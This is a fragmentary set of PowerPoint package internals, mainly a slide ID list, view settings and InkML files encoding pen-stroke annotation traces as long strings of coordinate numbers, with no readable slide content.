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4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink15.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/ink/ink1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1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79"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="1982" r:id="rId3"/>
    <p:sldId id="1983" r:id="rId4"/>
    <p:sldId id="2164" r:id="rId5"/>
    <p:sldId id="1986" r:id="rId6"/>
    <p:sldId id="2166" r:id="rId7"/>
    <p:sldId id="2165" r:id="rId8"/>
    <p:sldId id="2034" r:id="rId9"/>
    <p:sldId id="2035" r:id="rId10"/>
    <p:sldId id="2037" r:id="rId11"/>
    <p:sldId id="2038" r:id="rId12"/>
    <p:sldId id="2167" r:id="rId13"/>
    <p:sldId id="2168" r:id="rId14"/>
    <p:sldId id="2041" r:id="rId15"/>
    <p:sldId id="2042" r:id="rId16"/>
    <p:sldId id="2162" r:id="rId17"/>
    <p:sldId id="2043" r:id="rId18"/>
    <p:sldId id="2044" r:id="rId19"/>
    <p:sldId id="2045" r:id="rId20"/>
    <p:sldId id="2046" r:id="rId21"/>
    <p:sldId id="2048" r:id="rId22"/>
    <p:sldId id="2047" r:id="rId23"/>
    <p:sldId id="2051" r:id="rId24"/>
    <p:sldId id="2053" r:id="rId25"/>
    <p:sldId id="2124" r:id="rId26"/>
    <p:sldId id="2126" r:id="rId27"/>
    <p:sldId id="2169" r:id="rId28"/>
    <p:sldId id="570" r:id="rId29"/>
    <p:sldId id="2174" r:id="rId30"/>
    <p:sldId id="2170" r:id="rId31"/>
    <p:sldId id="2057" r:id="rId32"/>
    <p:sldId id="2058" r:id="rId33"/>
    <p:sldId id="2171" r:id="rId34"/>
    <p:sldId id="2060" r:id="rId35"/>
    <p:sldId id="2061" r:id="rId36"/>
    <p:sldId id="2172" r:id="rId37"/>
    <p:sldId id="1497" r:id="rId38"/>
    <p:sldId id="2078" r:id="rId39"/>
    <p:sldId id="1486" r:id="rId40"/>
    <p:sldId id="2001" r:id="rId41"/>
    <p:sldId id="2002" r:id="rId42"/>
    <p:sldId id="2003" r:id="rId43"/>
    <p:sldId id="2005" r:id="rId44"/>
    <p:sldId id="2116" r:id="rId45"/>
    <p:sldId id="2031" r:id="rId46"/>
    <p:sldId id="2128" r:id="rId47"/>
    <p:sldId id="2009" r:id="rId48"/>
    <p:sldId id="2175" r:id="rId49"/>
    <p:sldId id="2127" r:id="rId50"/>
    <p:sldId id="2010" r:id="rId51"/>
    <p:sldId id="2093" r:id="rId52"/>
    <p:sldId id="2094" r:id="rId53"/>
    <p:sldId id="2163" r:id="rId54"/>
    <p:sldId id="2096" r:id="rId55"/>
    <p:sldId id="2097" r:id="rId56"/>
    <p:sldId id="2026" r:id="rId57"/>
    <p:sldId id="2173" r:id="rId58"/>
    <p:sldId id="2011" r:id="rId59"/>
    <p:sldId id="2023" r:id="rId60"/>
    <p:sldId id="2021" r:id="rId61"/>
    <p:sldId id="2117" r:id="rId62"/>
    <p:sldId id="2074" r:id="rId63"/>
    <p:sldId id="2075" r:id="rId64"/>
    <p:sldId id="2082" r:id="rId65"/>
    <p:sldId id="2073" r:id="rId66"/>
    <p:sldId id="2016" r:id="rId67"/>
    <p:sldId id="2070" r:id="rId68"/>
    <p:sldId id="1502" r:id="rId69"/>
    <p:sldId id="2129" r:id="rId70"/>
    <p:sldId id="2101" r:id="rId71"/>
    <p:sldId id="2102" r:id="rId72"/>
    <p:sldId id="2103" r:id="rId73"/>
    <p:sldId id="2119" r:id="rId74"/>
    <p:sldId id="2104" r:id="rId75"/>
    <p:sldId id="2106" r:id="rId76"/>
    <p:sldId id="2121" r:id="rId77"/>
    <p:sldId id="212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FF40FF"/>
    <a:srgbClr val="95E9EA"/>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86"/>
    <p:restoredTop sz="94502"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="64" d="100"/>
          <a:sy n="64" d="100"/>
        </p:scale>
        <p:origin x="168" y="82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 Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.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6:16.496"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 24575,'20'23'0,"-1"2"0,14 13 0,-10-6 0,22 21 0,-6 18 0,13 10 0,-17-8 0,12-2 0,-2 4 0,-9-18 0,-5-14 0,-3 1 0,-2 15 0,15 19 0,-7 7 0,-2-12-425,1 9 425,-1-9 0,-5 12 0,5 0 0,-14 1 0,12-13 0,-14-15 0,11-3 0,-13-9 0,7 12 0,-6 0 0,2-11 425,-4-4-425,-2-19 0,-7 6 0,1 8 0,-4-3 0,4 3 0,-5-15 0,3-6 0,-2-1 0,3-3 0,-4-2 0,0-3 0,3 1 0,-2-1 0,6-4 0,-6-4 0,3-15 0,-8 1 0,0-6 0,-5 5 0,-3 2 0,-12-16 0,-2-9 0,-4 9 0,-18-40 0,2 33 0,-14-31 0,11 30 0,3-15 0,7 16 0,-11-30 0,5 20 0,14 7 0,6 5 0,17 19 0,-2-8 0,2 10 0,4 1 0,-4 4 0,4 0 0,-5 0 0,1-1 0,0-3 0,3 3 0,-2 1 0,2 4 0,1 8 0,0 4 0,4-3 0,0 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25:07.724"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">30 0 24575,'14'0'0,"2"4"0,-7-3 0,8 10 0,-8-5 0,8 7 0,-4-5 0,1 5 0,2-4 0,-7 4 0,4-5 0,-5-3 0,-3 3 0,3-7 0,-7 6 0,6-2 0,-6 4 0,7-5 0,-7 4 0,3-3 0,0 3 0,-3 1 0,6 0 0,-6-1 0,3 1 0,0-5 0,-3 4 0,6-3 0,-6 3 0,3 1 0,0 4 0,-3 0 0,7 0 0,-7 4 0,2-4 0,1 5 0,-3-1 0,3-4 0,-4 4 0,0-8 0,0 4 0,0-1 0,0 2 0,-4 3 0,3-4 0,-3 4 0,4-4 0,-4 1 0,3 2 0,-3-6 0,4 2 0,-3-7 0,2 2 0,-7-2 0,3 8 0,0 0 0,-3 0 0,4 4 0,-5-8 0,0 4 0,0-5 0,4 1 0,-2 0 0,2-1 0,0 1 0,-3-1 0,7 1 0,-7-1 0,4 1 0,-5 0 0,4-1 0,-3-3 0,3-1 0,-3 0 0,-5 0 0,3 5 0,-2 0 0,3-1 0,0-3 0,1 3 0,-1-7 0,4 6 0,-3-6 0,7 7 0,-3-3 0,4-16 0,0 7 0,-4-20 0,3 14 0,-6-7 0,6 4 0,-3-1 0,4 2 0,0 3 0,0 0 0,-4 4 0,3-3 0,-3 4 0,4-5 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,-4 4 0,3-2 0,-3 2 0,4 0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25:10.186"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'22'5'0,"-1"2"0,-8-6 0,4 3 0,-4 0 0,0-3 0,4 3 0,-8-4 0,4 0 0,-5 0 0,-3 4 0,3-3 0,-3 2 0,-1-6 0,4 2 0,-3-3 0,3 4 0,1 0 0,0 0 0,-1 0 0,1 3 0,-4-2 0,-2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25:29.095"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">219 301 24575,'-13'5'0,"0"-2"0,8 1 0,-3-3 0,4 7 0,-1-3 0,-3-1 0,7 4 0,-7-7 0,7 7 0,-7-4 0,4 5 0,-1-1 0,-3 1 0,3 0 0,0-1 0,-2 1 0,6-1 0,-7 1 0,7 3 0,-7-2 0,7 6 0,-7-2 0,3 3 0,1-3 0,-4 2 0,7-3 0,-7 1 0,3 2 0,0-6 0,-2 6 0,6-6 0,-7 6 0,3-6 0,0 6 0,1-6 0,0 6 0,3-3 0,-2 5 0,3 6 0,0-5 0,0 5 0,0 1 0,0-6 0,0 5 0,-4 1 0,3-10 0,-3 9 0,4-2 0,0-3 0,0 6 0,4-8 0,-3-3 0,2 2 0,-3-3 0,4 1 0,-3-2 0,3 1 0,-4-4 0,4 8 0,-3-8 0,3 4 0,-4-1 0,3-2 0,-2 6 0,7-6 0,-3 10 0,3-6 0,1 7 0,-4-3 0,2-5 0,-2 4 0,0-4 0,3 4 0,-7-3 0,6-2 0,-2 1 0,3-4 0,5 8 0,-3-8 0,6 4 0,-7-5 0,12 1 0,-7-1 0,14 2 0,-2 5 0,7-8 0,0 8 0,-7-14 0,44 22 0,-9-3 0,16 2 0,-29-5 0,0-1-442,33-3 442,-29-3 0,2 0 0,-3-1 0,1-1 0,1-4 0,-1 1 0,29 4 0,8-2 0,-28-7 0,-12 0 0,-3 0 0,-20 0 0,5 0 0,-12 0 0,13 0 0,-6 0 0,7 0 442,13 0-442,2 0 0,27 0 0,-10 0 0,22 0 0,3 0 0,3 0 0,-23 0 0,0 0 0,-26 0 0,5-5 0,-8 4 0,-17-4 0,-7 5 0,1 0 0,-1 0 0,0 0 0,8 0 0,1 0 0,7 0 0,0 0 0,13-7 0,-10 5 0,22-5 0,-9 7 0,-7 0 0,27 0 0,-36 0 0,18 0 0,-19 0 0,-6 0 0,0 0 0,-2 0 0,-7 4 0,1-3 0,-1 3 0,-4-4 0,4 4 0,-4-3 0,4 3 0,8-4 0,1 4 0,7-2 0,-11 3 0,21-5 0,3 0 0,17 0 0,7 6 0,-9-4 0,-12 5 0,-3-7 0,-20 0 0,-2-4 0,-10 3 0,9-3 0,-12 0 0,13-1 0,-15 1 0,8-4 0,-4 3 0,11-5 0,-5 1 0,13 3 0,-13-1 0,5 2 0,0 0 0,2 1 0,7-1 0,-7 4 0,-1-4 0,-1 5 0,2-5 0,7-1 0,0 0 0,0-4 0,13 2 0,-10-4 0,3 0 0,0-3 0,-18 1 0,7-4 0,-16 4 0,3-9 0,-5 7 0,5-8 0,-7 10 0,1-2 0,-1 2 0,1-3 0,0-1 0,-1-3 0,1 6 0,-4-5 0,2 10 0,-6-6 0,7 2 0,-7 1 0,6-4 0,-6 7 0,3-6 0,0 2 0,-3-3 0,3-1 0,0 5 0,-4-11 0,4 12 0,-4-12 0,0 10 0,0 0 0,0-2 0,0 2 0,0-3 0,-4-1 0,3 5 0,-6-4 0,6 4 0,-3-1 0,0-2 0,3 6 0,-7-3 0,3-3 0,-3 1 0,-1-2 0,0 0 0,0 4 0,1-1 0,-1-2 0,0 2 0,0-4 0,1 5 0,-1-4 0,0 8 0,0-8 0,5 7 0,-4-2 0,3 3 0,-4-4 0,1 4 0,-1-4 0,0 4 0,0 1 0,1-1 0,3 0 0,-7 0 0,6 1 0,-6-5 0,-1 3 0,3-2 0,-2 7 0,3-7 0,0 10 0,-3-9 0,2 6 0,-7-4 0,4 0 0,-5 1 0,1-5 0,-1 3 0,1 2 0,3 0 0,-2 3 0,2-4 0,-3 4 0,-1-2 0,1 2 0,-1-4 0,5 4 0,-23-6 0,17 6 0,-25-8 0,18 3 0,-7-1 0,10 1 0,-20 4 0,18-3 0,-21 3 0,20-4 0,-6 4 0,6-8 0,-20 12 0,10-13 0,-3 10 0,7-6 0,6 6 0,-7-5 0,0 9 0,7-4 0,-6 0 0,6 4 0,0-4 0,-6 0 0,6 3 0,-7-3 0,7 2 0,1 2 0,1-3 0,-2-1 0,-20 4 0,9-9 0,-8 4 0,-1-8 0,9 3 0,-21 3 0,9 3 0,0 0 0,3 4 0,13-9 0,-1 8 0,12-2 0,-1 4 0,2-5 0,2 3 0,-13-3 0,-9 2 0,11 2 0,-10-3 0,22 4 0,-6 0 0,5 0 0,-13 0 0,6-5 0,-15 4 0,13-4 0,-11 0 0,23 3 0,-7-3 0,2 5 0,-5 0 0,0-3 0,-6 2 0,6-3 0,-15 4 0,17 0 0,-14 0 0,23 0 0,-17 0 0,6 0 0,-7 0 0,7 0 0,-6 0 0,6 0 0,-7 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,6 0 0,-4 5 0,12-4 0,-13 4 0,13-5 0,-5 0 0,-14 7 0,16-6 0,-15 6 0,19-7 0,5 0 0,-4 4 0,4-3 0,-13 7 0,7-8 0,-2 8 0,-3-7 0,13 3 0,-9 0 0,11-3 0,-3 2 0,-2 1 0,1-3 0,-4 7 0,7-7 0,-2 6 0,-1-6 0,0 7 0,-5-7 0,5 3 0,-4 0 0,3 0 0,-3 1 0,-1 3 0,1-7 0,-4 6 0,2-2 0,-9 0 0,13-1 0,-9 0 0,10-3 0,-3 2 0,0 1 0,-1-3 0,1 7 0,-1-3 0,1-1 0,-1 4 0,1-3 0,3-1 0,1 0 0,5 0 0,-1 1 0,0 0 0,1 2 0,-1-2 0,-4 0 0,3 2 0,-2-6 0,3 7 0,0-7 0,1 7 0,-1-7 0,-4 6 0,0-2 0,-1 4 0,1-1 0,1-3 0,2 3 0,-2-7 0,3 6 0,-4-2 0,3 4 0,-2-5 0,7 4 0,-3-7 0,3 7 0,-7-4 0,2 5 0,-3-4 0,9 2 0,-4-6 0,7 3 0,-3-4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32:22.895"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">2154 1 24575,'-74'0'0,"0"0"0,14 2 0,3 3 0,5-1 0,4 1 0,-4 4 0,-32 15 0,7-11-1648,-17 21 1648,17-16 0,-7 15 0,31-11 354,-21 5-354,8 12 0,-17 8 0,12-1 0,-3 12 0,1-24 0,22-2 0,-1 1 0,3-8 0,0 0 0,-7 5 0,2 0 0,-21 11 1246,26-19-1246,-9 6 0,-31 10 0,29-7 0,-26 11 0,64-26 48,-9 10-48,23-10 0,-11 1 0,18-5 0,-7-8 0,7 5 0,-7-4 0,7-5 0,1-9 0,5-1 0,0-2 0,2 7 0,-6-3 0,3 3 0,-4-4 0,0 1 0,0-1 0,0-4 0,0 4 0,0-8 0,0 7 0,0-6 0,0-2 0,0 0 0,0-3 0,0 3 0,0-23 0,0 18 0,4-14 0,-3 21 0,3-17 0,-4 11 0,0-14 0,0 23 0,0 0 0,0 12 0,0-2 0,0 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32:24.391"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'22'0'0,"0"0"0,2 10 0,15 0 0,-3 6 0,22-1 0,-29-5 0,28 5 0,-35-10 0,15 6 0,-23-10 0,-2 3 0,-3-4 0,-1 0 0,1 0 0,0 4 0,3 0 0,-2 5 0,6 0 0,-6-5 0,6 0 0,-6-4 0,2 0 0,0 0 0,6 0 0,-4 0 0,2 0 0,-11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28:38.424"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">308 0 24575,'0'30'0,"4"-1"0,-2 17 0,2-10 0,-4 23 0,7-10 0,-5 12 0,12 1 0,-13-13 0,13 9 0,-12-9 0,12 13 0,-6-1 0,1 1 0,4 0 0,-11-1 0,5 1 0,0-1 0,-6 1 0,13 0 0,-7-14 0,1-2 0,2-13 0,-9-7 0,4-1 0,-5-1 0,4 2 0,-2 0 0,3-2 0,-5-10 0,0-2 0,0-3 0,3 3 0,-2-2 0,3 6 0,-4-6 0,0 6 0,4-7 0,-3 8 0,3-4 0,-4 1 0,4-2 0,-3-3 0,2-1 0,-3 1 0,0 0 0,0-1 0,0 1 0,0 3 0,4-2 0,-3 2 0,3-3 0,0 3 0,-3 2 0,7 10 0,-6-5 0,2 2 0,-4-5 0,4-7 0,-3 4 0,3-5 0,-4 1 0,4-4 0,-19-17 0,11 4 0,-27-18 0,16 16 0,-17-11 0,0-6 0,-2 2 0,-5-8 0,5 11 0,-16-14 0,19 12 0,-17-12 0,28 18 0,-4-2 0,6 3 0,1 0 0,3-1 0,2 8 0,3-5 0,0 9 0,1-7 0,-5 5 0,7-1 0,-6 0 0,8 4 0,-1 1 0,1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28:39.632"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 451 24575,'13'-22'0,"3"4"0,-6 2 0,8-5 0,-8 6 0,9-9 0,-6 11 0,4-5 0,1 4 0,1-9 0,-1 8 0,-2-10 0,-4 8 0,-3 3 0,-5 2 0,4 3 0,-3 0 0,0 0 0,2 4 0,-6-2 0,7 6 0,-7-7 0,3 3 0,-1 0 0,-2-3 0,3 4 0,0-5 0,-3 0 0,7 4 0,-4-2 0,1 2 0,7-8 0,-10 3 0,9-2 0,-10-1 0,7 3 0,-7-2 0,3 7 0,-4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21:55.748"/>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0 196 16383,'65'0'0,"-9"0"0,-19 0 0,-8 0 0,30 0 0,2-8 0,4 6 0,22-6 0,3 8 0,4 0 0,-23-1 0,0 2 0,-21 2 0,1 2 0,27 0 0,1 0 0,-24 1 0,0-1 0,11 0 0,1-2 0,-8-6 0,1-2 0,14 0 0,0 0 0,-24 0 0,0 0 0,17-3 0,-5 1 0,-10 5 0,20-6 0,-11 8 0,-2 0 0,2 0 0,14 0 0,-9-2 0,-4-1 0,-22 2 0,13-4 0,-22 5 0,14 8 0,-7 0 0,28 6 0,-29-3 0,23 2 0,14 3 0,-15-7 0,3-1 0,-7-3 0,3 0 0,28 4 0,-2-2 0,-33-6 0,-2 0 0,24 3 0,-3 0 0,11-4 0,-4 3 0,0 2 0,2 4 0,-7 2 0,0-1 0,5 0 0,-10 2 0,-19-12 0,-2 0 0,-20 0 0,22 0 0,-15 0 0,-7 0 0,18 0 0,-11 0 0,14 0 0,19-5 0,-33 4 0,28-4 0,-35 5 0,36 0 0,-28 0 0,39 0 0,-18 0 0,9 0 0,24 0 0,-5 1 0,4-2 0,-26-7 0,4-2 0,17 3 0,10 1 0,-14-3 0,15-13 0,-18 8 0,0 3 0,15 9 0,-15-7 0,1 1 0,-17 7 0,-1 0 0,9-7 0,-5 0 0,0-1 0,-13-4 0,22-3 0,-19 11 0,3 3 0,33-6 0,-22 9 0,-1 2 0,0-1 0,11 3 0,-27-5 0,7 0 0,1 0 0,6 0 0,20 0 0,3 0 0,2 0 0,-28 0 0,-3 0 0,-2 0 0,16 0 0,-12 8 0,0-5 0,1 2 0,12 10 0,-16-6 0,-1-2 0,10 0 0,11 5 0,5 0 0,-21-10 0,0 0 0,21 10 0,-1 0 0,-20-11 0,-5 0 0,26 7 0,6-8 0,-13 0 0,-22 0 0,32 0 0,-44 0 0,33 0 0,-37 0 0,5 0 0,-10 0 0,11 0 0,-12 0 0,31 0 0,-31 0 0,18 0 0,-3 0 0,34-10 0,2 7 0,-14-6 0,-1-1 0,5 8 0,-17-6 0,1-2 0,35-1 0,-27 2 0,9-1 0,-5 1 0,4 3 0,0-1 0,5-3 0,4-2 0,-13 2 0,5 1 0,-21-2 0,-3-1 0,1-1 0,14 0 0,3 2 0,-1 0 0,-1 0 0,-2 1 0,-13 8 0,40-5 0,-20 7 0,-16-4 0,3 0 0,36 2 0,-34-2 0,0 0 0,23 4 0,5 0 0,-37 0 0,8 0 0,2 0 0,-3-4 0,7 4 0,0-1 0,-18-3 0,19 9 0,-18-4 0,14 11 0,-20-10 0,20 9 0,-34-9 0,6 3 0,-6-1 0,7 2 0,0 1 0,7 2 0,-5-7 0,14 2 0,-21 0 0,4-3 0,-8 3 0,17 1 0,-5 1 0,20 5 0,-21-5 0,-1-1 0,10 2 0,27 6 0,-15 2 0,-5-8 0,0-1 0,2-1 0,23-5 0,-34 0 0,29 0 0,8 0 0,-27 0 0,-1 0 0,21 0 0,1 0 0,-17 0 0,-5 0 0,20 0 0,22 0 0,-20 0 0,-1 0 0,16 0 0,-34-3 0,-5 1 0,-3 0 0,-5-3 0,-13 5 0,19 0 0,-26 0 0,19 0 0,-10 0 0,-3 0 0,1 0 0,0 4 0,-1-3 0,18 3 0,-17-4 0,24 0 0,-23 0 0,52-9 0,-40 7 0,42-12 0,-46 13 0,11-4 0,-3 5 0,32 0 0,4 0 0,2 0 0,-24 0 0,-33 0 0,-6 0 0,7 4 0,-2 1 0,10-1 0,-10 0 0,-4 0 0,4-3 0,6 3 0,-5-4 0,3 0 0,-7 0 0,4 0 0,4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26:43.732"/>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15 16383,'65'9'0,"-10"-4"0,-30 3 0,-6-6 0,25 3 0,-2-5 0,19 6 0,1-4 0,-13 2 0,2-1 0,33-3 0,-26-1 0,-1 2 0,8 4 0,19-4 0,-19 4 0,12-5 0,-3 0 0,-12 0 0,0 0 0,-13 0 0,9 0 0,-29 0 0,8 0 0,-19 0 0,7-4 0,1 3 0,1-7 0,2 7 0,0-11 0,-5 9 0,11-5 0,-16 4 0,9 3 0,2-7 0,-10 7 0,16-3 0,-10 4 0,2 0 0,7 0 0,4 7 0,-3-5 0,10 4 0,-1-6 0,4 7 0,40 2 0,-8-1 0,11 6 0,-17-12 0,-14 12 0,1-13 0,0 6 0,-21-3 0,16-3 0,-28 3 0,17-4 0,-13 0 0,0 0 0,-11-4 0,9 3 0,3-3 0,3 4 0,8 0 0,-12 0 0,0 0 0,0 0 0,1 0 0,11 0 0,-9 0 0,23 0 0,-23 0 0,10 0 0,0 0 0,2 0 0,-6 0 0,15 0 0,-28 0 0,17 0 0,-13 0 0,13 0 0,3 0 0,0 0 0,-4 0 0,1 7 0,-17-5 0,15 4 0,-5-6 0,-3 5 0,3-4 0,5 4 0,0-5 0,18 0 0,1 7 0,-14-5 0,-3 5 0,0-7 0,3 0 0,12 0 0,1 7 0,0-6 0,-1 6 0,1-7 0,14 0 0,-23 0 0,20 0 0,-37 0 0,3 0 0,5-7 0,-2 5 0,-1-8 0,3 9 0,-5-3 0,10 4 0,13 0 0,-13 0 0,9 0 0,-22 0 0,23 0 0,-8-5 0,23 4 0,-20-4 0,18 5 0,-24 0 0,14 0 0,-13 0 0,22 0 0,-6 0 0,25 0 0,-12 0 0,-17 5 0,-2-4 0,-23 9 0,22-2 0,-9 5 0,13-4 0,-13 2 0,-4-9 0,1 2 0,3-4 0,-7 0 0,15 0 0,12 0 0,-1 0 0,-17 0 0,0 0 0,14 0 0,9 0 0,-25 0 0,9-7 0,-9 6 0,0-6 0,-3 7 0,2 0 0,-19 0 0,17 0 0,-27-4 0,13 3 0,1-3 0,-5 0 0,11 3 0,-20-3 0,13 4 0,-6 0 0,0 0 0,38-8 0,-17 6 0,13-2 0,2 0 0,10 4 0,-21 0 0,0 0 0,10 0 0,-10-4 0,-2-1 0,3 3 0,23-11 0,-3 0 0,-36 9 0,25-8 0,0 1 0,-29 9 0,34-10 0,-18 11 0,-4-8 0,2 8 0,-1-11 0,-9 10 0,38-10 0,-22 11 0,5-4 0,-1 5 0,-14 0 0,20 7 0,0-5 0,-1 11 0,1-4 0,-1 0 0,-12-3 0,-3-6 0,27 0 0,-41 0 0,51 0 0,-45 0 0,24 0 0,12 0 0,16 0 0,-22 0 0,-11-4 0,-5 0 0,-16 1 0,46-5 0,-40 8 0,20-7 0,12 5 0,18-5 0,-11 7 0,-28 0 0,-4 0 0,-4 0 0,24 0 0,-14 0 0,10-7 0,9 5 0,-25-5 0,22 15 0,-6-6 0,25 14 0,0-14 0,0 6 0,1 0 0,-40-7 0,0 0 0,30 7 0,-20-8 0,3 0 0,-2 4 0,0 0 0,1-3 0,0 0 0,-2 3 0,-4 0 0,17-4 0,2 0 0,-23 5 0,20-4 0,-24 11 0,27-10 0,-23 4 0,-4-6 0,-6 0 0,-18 0 0,47 0 0,-33 0 0,19 0 0,-25 0 0,0 0 0,0 0 0,1 0 0,-12 0 0,8 0 0,0 0 0,-2 0 0,11 0 0,-13 0 0,20 0 0,2 0 0,1 0 0,-10 0 0,-8 0 0,-5 0 0,20 0 0,-10 0 0,10 0 0,-13 0 0,0 0 0,-7 0 0,5 5 0,-4 1 0,6 1 0,-7-3 0,5-4 0,-12 4 0,20-3 0,-11 3 0,25-4 0,-16 0 0,8 0 0,-12 0 0,0 0 0,-11 0 0,21 0 0,-28 0 0,28 0 0,-13 0 0,5 0 0,6 0 0,4 7 0,-9-5 0,10 4 0,-13-6 0,0 0 0,0 0 0,-7 0 0,6 0 0,-13 0 0,13 0 0,7 0 0,-13 0 0,6 0 0,-8 4 0,-1-3 0,8 3 0,0-4 0,8 0 0,-3 5 0,3-4 0,-8 4 0,-5-5 0,0 0 0,2 0 0,-2 0 0,1 0 0,6 0 0,-3 0 0,3 0 0,-7 0 0,-2 4 0,1-3 0,2 6 0,0-6 0,13 3 0,-19 0 0,18-3 0,-20 3 0,9-4 0,-2 4 0,-3-4 0,5 8 0,-6-3 0,4 0 0,0-2 0,0-3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26:47.885"/>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1 230 16383,'50'-2'0,"0"-1"0,24-1 0,-21 8 0,3 2 0,41 5 0,-19-5 0,4 0 0,-14 4 0,2-2 0,28-6 0,0-2 0,-27 5 0,2-1 0,10-3 0,8-1 0,-1-1 0,-12 1 0,-2 0 0,1 0 0,0 0 0,2 0 0,6 0 0,-9 0 0,7 0 0,3 0 0,-2 0 0,-7 0 0,11 0 0,-6 0 0,8 0 0,-1 0 0,9 1 0,4-1 0,-4 0 0,-10-1 0,2-2 0,-8 0 0,0-1 0,13 1 0,2-1 0,-8-1 0,-1-5 0,0-2 0,4-1 0,7-1 0,-8 0 0,-2-2 0,0-2 0,-16 4 0,9-2 0,-2 1 0,-13 0 0,-4-1 0,-6 0 0,16-3 0,-3 2 0,17-1 0,4 13 0,1 1 0,-1-4 0,-3 8 0,0 0 0,0 0 0,-28 0 0,4 0 0,-3 0 0,3 0 0,23 0 0,-3 0 0,-34 0 0,0 0 0,16 0 0,-2 0 0,13 7 0,-2 2 0,-14-1 0,28 13 0,-8-18 0,-27 8 0,-3 0 0,14-9 0,10 6 0,1 0 0,-7-6 0,4 2 0,-2 0 0,-9-4 0,-11 0 0,-5 0 0,42 0 0,-29 0 0,0-4 0,-2 0 0,-12 2 0,12-6 0,-18 8 0,41 0 0,2 0 0,-26 2 0,-1 1 0,23-2 0,-15 4 0,-4-5 0,-1-9 0,-6 7 0,11-11 0,-28 12 0,-2-3 0,-1 4 0,8 0 0,10 0 0,18 4 0,5 1 0,21-3 0,-16 6 0,0 1 0,12-7 0,0 14 0,0-14 0,-25 11 0,32-12 0,-55 8 0,29-7 0,-12 11 0,-7-11 0,22 6 0,15-2 0,-21-4 0,25 5 0,-17 1 0,-28-6 0,9 6 0,37 6 0,-32-11 0,4 6 0,-1 0 0,-12-2 0,20-1 0,-37-1 0,45-5 0,-39 0 0,19 0 0,-17 6 0,-15-4 0,17 10 0,35-11 0,-11 4 0,-18-5 0,0 0 0,10 0 0,0 0 0,-25 0 0,52 0 0,-45 5 0,26-4 0,-38 4 0,21-5 0,0 0 0,37 0 0,-12 0 0,-17 3 0,-2 1 0,13-3 0,-16 3 0,-1-1 0,-3-3 0,18 0 0,2 0 0,-14 0 0,7 0 0,-5 0 0,-31 0 0,44 0 0,-33 0 0,28 0 0,-33 5 0,20-4 0,-25 4 0,16-5 0,-20 5 0,44-4 0,-35 4 0,34-5 0,-50 0 0,5 0 0,15 0 0,18 0 0,36 0 0,-30 0 0,19 0 0,-28 0 0,-2 0 0,42 0 0,-40 0 0,12 3 0,5 2 0,-15 1 0,1-1 0,19 1 0,-2-1 0,19 4 0,-25-5 0,10-1 0,-9-1 0,25 0 0,-1 3 0,-2-1 0,-8-4 0,8 9 0,-27-6 0,-4 4 0,0 4 0,14 8 0,-1-5 0,9 10 0,-40-22 0,7 4 0,12-1 0,-32-3 0,6 2 0,-14-4 0,1 0 0,8 0 0,-4 0 0,13 0 0,-11 0 0,13 0 0,-8 0 0,0 0 0,-7 0 0,9 0 0,-15 0 0,8 0 0,4 4 0,-11 1 0,33 0 0,-24-1 0,17-4 0,-1 6 0,30-4 0,-20 5 0,43-7 0,-35 0 0,-14 0 0,3 0 0,1 0 0,-2 0 0,41 0 0,-36 0 0,-1 0 0,24 0 0,-22 0 0,0 0 0,35 0 0,-41 0 0,-1 0 0,41-5 0,-14 4 0,-2-11 0,-34 10 0,-5-5 0,-19 7 0,18-5 0,-8 4 0,30-4 0,-22 5 0,10 0 0,-1 0 0,4 0 0,0 0 0,37 0 0,-30 0 0,20 0 0,-5 0 0,-38 0 0,36 0 0,-27 0 0,7 0 0,9 0 0,-22 0 0,18-5 0,-19 4 0,5-4 0,-7 5 0,0 0 0,13 0 0,-10 